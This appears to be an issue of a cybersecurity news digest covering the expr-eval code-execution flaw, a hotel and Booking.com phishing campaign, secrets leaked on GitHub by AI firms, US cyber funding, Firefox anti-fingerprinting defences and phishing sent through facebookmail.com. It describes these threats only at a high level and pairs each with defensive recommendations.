The Pulse of Cloud and Cyber — Issue 2: Special Edition on Practical Security From a compromised JavaScript library to the hidden war over your data

Critical RCE Vulnerability in expr-eval Library: When JavaScript Calculators Execute Arbitrary Code

Recent disclosures from the GitHub Advisory Database and CERT/CC have revealed a significant security flaw in the widely-used expr-eval library and its forks, tracked as CVE-2025-12735. The vulnerability stems from insufficient input validation in the evaluate() function, which fails to properly sanitize object inputs. This oversight allows attackers to inject malicious objects as variables, potentially leading to arbitrary code execution in specific scenarios.

The library's widespread adoption across diverse projects—ranging from simple web applications to sophisticated NLP and AI services—amplifies the potential impact of this vulnerability. At the time of writing, the CVE has been classified as high severity, with software supply chain monitoring revealing multiple versions of the library actively deployed throughout the npm ecosystem. Particularly concerning is the transitive dependency pattern, where numerous projects unknowingly incorporate the vulnerable library through their dependencies.

Why This Matters

For organizations utilizing expr-eval in server-side environments or systems with operating system access to evaluate user-supplied expressions, this vulnerability represents a critical escalation path from a seemingly benign logic issue to complete server compromise. Node.js and frontend teams relying on this library—whether directly or through transitive dependencies—should take immediate action:

Conduct comprehensive dependency scans for expr-eval and expr-eval-fork
• Review all instances where evaluate() processes untrusted input
• Implement strict input validation and isolation measures (sandboxing, context restriction, avoiding execution on primary servers)
• Upgrade to patched versions immediately upon release

Double-Charged: Sophisticated Phishing Campaign Targets Hotels and Their Guests

A comprehensive investigation by Sekoia.io has uncovered a multi-layered attack campaign targeting hotel management systems. The operation employs a sophisticated chain of techniques, from initial phishing emails through ClickFix malware deployment, culminating in PureRAT installation for persistent system control.

The attack methodology follows a carefully orchestrated sequence. Initially, attackers compromise hotel manager systems through phishing, gaining access to Booking.com accounts or similar platforms such as Expedia. Leveraging legitimate extranet credentials, they then initiate duplicate charges for existing reservations, creating the illusion of official communication from the hotel or booking platform. In several documented cases, attackers deployed convincing payment pages mimicking Booking.com's interface, hosted behind Cloudflare infrastructure, to harvest guests' banking credentials.

Supporting this operation is an extensive underground ecosystem operating within Russian-language forums, where threat actors trade hotel manager email databases, authentication cookies, credentials, and infostealer logs.

Implications for the Hospitality Industry

Organizations in hospitality, tourism, and businesses dependent on booking platforms must recognize that official channels cannot be presumed secure. Administrative security—encompassing email systems, workstations, antivirus solutions, and EDR deployment—has become mission-critical. Essential protective measures include:

Restricting administrative logins to hardened, managed devices
• Enforcing multi-factor authentication across all access points
• Implementing granular access controls for administrative functions
• Establishing alerts for duplicate billing transactions and unusual account modifications

For security operations centers, Sekoia's report provides actionable detection queries and Sigma rules for identifying PowerShell misuse, DLL sideloading, and anomalous AddInProcess32.exe behavior, ready for SIEM integration.

AI Companies Exposing Themselves on GitHub

Cloud security firm Wiz conducted an extensive analysis of the Forbes AI 50 list, examining the top 50 private artificial intelligence companies. Their findings reveal that 65% of these organizations have experienced at least one confirmed secrets exposure on GitHub, ranging from API tokens and keys to sensitive credentials.

The research methodology extended beyond superficial repository scanning to encompass complete commit histories, deleted forks, gists, and public repositories belonging to organization members. Significantly, a substantial portion of exposed secrets was discovered in the periphery of the GitHub ecosystem rather than within primary organizational repositories.

Security Beyond Models and Datasets

For AI and machine learning teams, security considerations must extend beyond model protection and dataset integrity. GPU access tokens, proprietary datasets, and cloud infrastructure credentials have become primary targets. Essential security measures include:

Expanding secret scanning beyond primary organizations to include personal accounts, gists, and forks
• Implementing robust token rotation policies and strict controls on GitHub Personal Access Tokens and cloud keys
• Utilizing formal secrets management solutions rather than committing .env files to repositories, particularly for sensitive model-related projects

Government Shutdown Continues, But Cybersecurity Cannot: Temporary Extension of CISA Act and FCEA Funding

Amid the longest federal government shutdown in United States history, H.R.5371 (Continuing Appropriations and Extensions Act, 2026) has been introduced to Congress to temporarily restore critical funding. This legislation extends financial support for the Cybersecurity Information Sharing Act (CISA Act) and Federal Cybersecurity Enhancement Act (FCEA) through January 2026.

The CISA Act establishes the framework for threat intelligence sharing between private sector entities and government agencies, while FCEA defines security standards and mechanisms for federal critical infrastructure. Without this extension, the formal apparatus for receiving and distributing threat intelligence at the national level would effectively cease operations.

However, this represents merely a stopgap measure. Should long-term agreement fail to materialize by year-end 2025, the risk of renewed budgetary gaps in early 2026 remains substantial.

Implications for Threat Intelligence Consumers

Organizations relying on U.S. government threat feeds or CISA-based frameworks should note that while short-term threat intelligence sharing mechanisms remain operational, contingency planning for potential non-renewal scenarios is prudent. This necessitates increased reliance on commercial and open-source threat intelligence, along with strengthened regional and industry-specific collaborative arrangements.

Firefox 145 and the War on Fingerprinting: Dramatic Reduction in User Tracking

Mozilla has announced that Firefox 145 introduces a new generation of anti-fingerprinting defenses, which, according to real-world data, approximately halve the proportion of users who can be uniquely fingerprinted. These protections are currently active in Private Browsing mode and Enhanced Tracking Protection – Strict mode.

The implemented measures include restricting hardware information disclosure (CPU core counts, touch capabilities, dock/taskbar dimensions), standardizing available fonts (excluding essential language fonts), and introducing randomized noise to certain graphics and image readings to neutralize canvas-based fingerprinting techniques.

Mozilla emphasizes their approach balances usability with privacy. Certain information, such as timezone data essential for calendar and conferencing services, remains accessible to prevent web functionality degradation.

Implications for Users and Web Developers

For privacy-conscious users, Firefox with Enhanced Tracking Protection in Strict mode now represents one of the market's most robust options. Web development teams should recognize that increasingly aggressive fingerprinting techniques correlate with higher probability of degraded user experiences on browsers like Firefox. Dependencies on fingerprinting for user identification—such as anti-fraud measures—warrant review and migration toward less invasive methodologies.

Phishing via Official facebookmail.com Domain: Meta Business Suite Exploitation

Research by Check Point's Harmony Email Security team has documented an extensive phishing campaign exploiting Meta Business Suite and the legitimate facebookmail.com domain. The attack methodology involves creating fraudulent Facebook Business pages with logos and names mimicking legitimate brands, then leveraging Business Suite's collaboration invitation and advertising program features to dispatch emails resembling authentic Facebook notifications—genuinely originating from the facebookmail.com domain.

Common themes include invitations to free advertising credit programs, official Meta partner programs, and account verification requirements. Embedded links redirect to phishing pages (frequently hosted on domains such as vercel.app) designed to harvest account credentials.

According to Check Point telemetry, over 40,000 phishing emails have been delivered to approximately 5,000 organizations, with one company receiving more than 4,200 such messages. Targets predominantly comprise small and medium businesses in sectors including online advertising, automotive, education, and real estate.

Beyond Domain Verification

This campaign demonstrates that traditional security training focused solely on sender domain verification proves insufficient when legitimate domains become components of the attack chain. Marketing and social media teams should implement mandatory multi-factor authentication across all Meta, Facebook, and Instagram accounts, establish protocols for reporting suspicious emails through internal security channels regardless of apparent sender legitimacy, and restrict Business Suite access to managed devices with MDM/EDR protection.

Editorial Summary

The JavaScript supply chain continues to present significant risk vectors. A seemingly minor library like expr-eval can transform into a backdoor for code execution on production servers, particularly within AI and NLP environments. Dependency hygiene has evolved from a luxury to a fundamental security requirement.

Phishing has matured into an organized business model. From hotels to booking platforms, the "double-charge" methodology and black market for Booking.com logs demonstrate how attackers focus on specific vertical ecosystems, offering every component as-a-service.

The AI sector's GitHub exposure reveals systemic challenges. If 65% of Forbes AI 50 companies have leaked secrets on GitHub, organizations lacking rigorous secrets management and Git hygiene policies likely face identical risks.

Even amid government shutdowns, Congress recognizes the strategic imperative of maintaining CISA Act and FCEA funding through temporary measures, underscoring that threat intelligence sharing infrastructure cannot be casually suspended.

Finally, the contrast between Firefox's advanced anti-fingerprinting capabilities and the exploitation of facebookmail.com illustrates the dual nature of the current landscape: users caught between browsers fighting for their privacy and platforms inadvertently becoming attack vectors.